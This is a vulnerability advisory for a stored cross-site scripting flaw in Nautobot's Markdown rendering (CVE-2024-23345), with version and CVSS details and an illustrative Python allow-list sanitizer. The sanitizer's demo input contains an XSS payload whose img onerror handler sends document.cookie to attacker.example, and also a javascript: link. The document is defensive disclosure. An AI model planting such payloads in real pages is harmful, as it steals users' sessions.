Nautobot has XSS potential in rendered Markdown fields
CVE-2024-23345

7.1 HIGH

Key Information:

Vendor: Nautobot

Status: Vendor

CVE Published: 23 January 2024

What is CVE-2024-23345?

Nautobot, a network automation platform and network source of truth, contains a cross-site scripting (XSS) vulnerability caused by insufficient sanitization of user-editable fields that are rendered as Markdown. Markdown renderers pass inline HTML through to the page unless their output is sanitized, so an authenticated user who can edit such a field can store a payload (a typical example is an inline script element or a link with a javascript: URL) that executes in the browser of any other user who later views the rendered field. The CVSS vector on this page reflects that attack path: low privileges are required to store the payload, a victim has to view the page, and the impact lands in the victim's session rather than the attacker's (scope changed). Nautobot 1.x releases before 1.6.10 and 2.x releases before 2.1.2 are affected; the fix ships in 1.6.10 and 2.1.2. Check the installed version (for example with pip show nautobot in the Nautobot environment) and upgrade to the fixed release for your major version.
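The following is an added example, not Nautobot's code or the project's actual fix. It shows the class of control an advisory like this calls for: HTML emitted by a Markdown renderer is passed through an allow-list sanitizer before being marked safe for a template, so that stored script elements, event-handler attributes and javascript: links never reach a viewer's browser. It uses only the Python standard library; the tag and attribute allow-lists, the sanitizer class name, and the sample rendered HTML are constructed for this illustration. A production deployment would apply the same policy through a maintained sanitizer library.

```python
"""Allow-list sanitizer for HTML produced by a Markdown renderer.

Added example (stdlib only); not Nautobot's code. Markdown renderers pass
inline HTML through by default, so the rendered output must be filtered
against an allow-list before a template marks it safe.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags and attributes a notes/comments field legitimately needs (assumption).
ALLOWED_TAGS = {
    "p", "br", "a", "strong", "em", "code", "pre", "blockquote",
    "ul", "ol", "li", "h1", "h2", "h3", "h4",
    "table", "thead", "tbody", "tr", "th", "td",
}
VOID_TAGS = {"br"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
# Link schemes that are allowed; javascript:, data:, vbscript: etc. are dropped.
SAFE_SCHEMES = {"http", "https", "mailto"}
# For these elements the text content is dropped too, not just the tag.
RAW_TEXT_TAGS = {"script", "style"}
_CONTROL_CHARS = "".join(map(chr, range(33)))  # C0 controls plus space


def is_safe_url(value):
    """True for relative URLs and absolute URLs with an allow-listed scheme."""
    # Browsers ignore tab/newline anywhere in a URL and strip leading/trailing
    # controls, so "java\tscript:" is javascript: to them; normalise the same
    # way before looking at the scheme (newer urlsplit also strips \t\r\n).
    cleaned = "".join(ch for ch in value if ch not in "\t\r\n").strip(_CONTROL_CHARS)
    scheme = urlparse(cleaned).scheme  # urlsplit lower-cases the scheme
    return scheme == "" or scheme in SAFE_SCHEMES


class MarkdownHTMLSanitizer(HTMLParser):
    """Re-serialises only allow-listed tags/attributes; escapes all text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)  # entities arrive decoded
        self.out = []
        self.open_tags = []   # allowed tags still open, closed at the end
        self.dropped = []     # record of removed items, useful for logging
        self._raw_depth = 0   # > 0 while inside <script> / <style>

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self._raw_depth += 1
            self.dropped.append(tag)
            return
        if self._raw_depth or tag not in ALLOWED_TAGS:
            self.dropped.append(tag)  # img, iframe, svg, form, ...
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")  # onerror=, onclick=, style=
                continue
            if name == "href" and not is_safe_url(value):
                self.dropped.append(f"{tag}@href={value}")
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/>; anything else is dropped above

    def handle_endtag(self, tag):
        if tag in RAW_TEXT_TAGS:
            self._raw_depth = max(0, self._raw_depth - 1)
            return
        if self._raw_depth or tag not in self.open_tags:
            return
        while self.open_tags:  # close anything left open inside this tag
            top = self.open_tags.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self._raw_depth:
            self.out.append(escape(data, quote=False))  # & < > re-encoded

    def handle_comment(self, data):
        self.dropped.append("comment")  # comments are never re-emitted

    def result(self):
        self.close()  # flush buffered text
        closing = "".join(f"</{t}>" for t in reversed(self.open_tags))
        self.open_tags = []
        return "".join(self.out) + closing


def sanitize_rendered_markdown(html):
    """Return (clean_html, dropped_items) for a Markdown renderer's output."""
    sanitizer = MarkdownHTMLSanitizer()
    sanitizer.feed(html)
    return sanitizer.result(), sanitizer.dropped


if __name__ == "__main__":
    # Constructed sample: a note mixing legitimate formatting with injected
    # inline HTML, as a renderer would emit it. Hostnames are placeholders.
    rendered = (
        '<p>Rack <strong>R-01</strong> relocated, see '
        '<a href="https://wiki.example.com/r01">ticket</a>.</p>'
        '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
        '<a href="javascript:alert(document.domain)">click</a>'
    )
    clean, dropped = sanitize_rendered_markdown(rendered)
    print(clean)
    print("dropped:", dropped)
```

The dropped list is the part worth wiring into monitoring: a stored field whose rendering repeatedly drops script tags, event-handler attributes or javascript: links is a user probing for exactly this bug.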

Affected Version(s)

nautobot >= 2.0.0, < 2.1.2 (fixed in 2.1.2)

nautobot < 1.6.10 (fixed in 1.6.10)

CVSS V3.1

Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:L
Score: 7.1
Severity: HIGH
Attack Vector: Network
Attack Complexity: High
Privileges Required: Low
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: High
Availability: Low

Timeline

  • Vulnerability published: 23 January 2024

  • Vulnerability reserved